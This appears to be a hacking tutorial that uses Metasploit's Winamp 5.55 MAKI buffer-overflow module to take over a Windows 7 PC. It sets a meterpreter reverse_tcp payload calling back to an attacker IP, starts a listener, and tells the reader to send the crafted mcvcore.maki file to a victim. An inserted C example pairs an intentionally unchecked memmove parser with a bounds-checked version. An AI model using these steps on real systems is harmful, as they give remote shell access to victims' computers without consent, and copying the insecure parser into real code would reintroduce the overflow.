Hack Remote Windows 7 PC using Winamp MAKI Buffer Overflow

This module exploits a stack-based buffer overflow in Winamp 5.55. The flaw exists in gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user-controlled data. To exploit the vulnerability the attacker must convince the user to install the generated mcvcore.maki file in the “scripts” directory of the default “Bento” skin, or to generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
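As an added illustration (not part of the original post, not Winamp's code, and not the real MAKI file layout), the C below shows the defect class named above, a length field read straight from the file and handed to memmove with no bounds check, beside a hardened parser that rejects such input. The record layout, the MAX_ENTRIES capacity and the sample bytes are constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_ENTRIES 16  /* capacity of the fixed-size destination buffer */
/* Hypothetical record layout used only for this illustration (not the real
 * MAKI format): 2-byte magic "FG", little-endian uint32 entry count, then
 * count * 4 bytes of entry data. */

static uint32_t rd32(const uint8_t *p) {  /* little-endian uint32 */
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The defect class the page describes: the count comes from the file and goes
 * straight to memmove, so a large count writes past the buffer. Never call it. */
int parse_entries_insecure(const uint8_t *buf, size_t len, uint32_t *out) {
    uint32_t count = rd32(buf + 2);
    memmove(out, buf + 6, count * 4);  /* neither count nor len is checked */
    return (int)count;
}

/* Hardened parser: check the magic, bound the count by the destination
 * capacity, and bound it by the bytes actually present before any copy.
 * Returns the number of entries copied, or -1 when the input is rejected. */
int parse_entries(const uint8_t *buf, size_t len, uint32_t *out) {
    if (len < 6 || buf[0] != 'F' || buf[1] != 'G')
        return -1;
    uint32_t count = rd32(buf + 2);
    if (count > MAX_ENTRIES)              /* would overflow the destination */
        return -1;
    if ((size_t)count * 4 > len - 6)      /* claims more data than supplied */
        return -1;
    memmove(out, buf + 6, (size_t)count * 4);
    return (int)count;
}

/* Constructed samples: a valid file with two entries, a file whose count
 * field is 0xFFFFFFFF, and a file that claims three entries but carries one. */
const uint8_t sample_ok[]    = {'F','G', 2,0,0,0, 1,0,0,0, 2,0,0,0};
const uint8_t sample_huge[]  = {'F','G', 0xff,0xff,0xff,0xff};
const uint8_t sample_short[] = {'F','G', 3,0,0,0, 1,0,0,0};
uint32_t scratch[MAX_ENTRIES];

int main(void) {
    printf("ok: %d\n",    parse_entries(sample_ok, sizeof sample_ok, scratch));
    printf("huge: %d\n",  parse_entries(sample_huge, sizeof sample_huge, scratch));
    printf("short: %d\n", parse_entries(sample_short, sizeof sample_short, scratch));
    return 0;
}
```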

Exploit Targets

Winamp 5.55

Requirement

Attacker: Backtrack 5

Victim PC: Windows 7

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/fileformat/winamp_maki_bof

msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (winamp_maki_bof)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (winamp_maki_bof)>exploit

After the malicious MAKI file is successfully generated, it is stored on your local computer at

/root/.msf4/local/mcvcore.maki

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send the mcvcore.maki file to the victim; as soon as they download and open it, you have access to a meterpreter shell on the victim's computer.
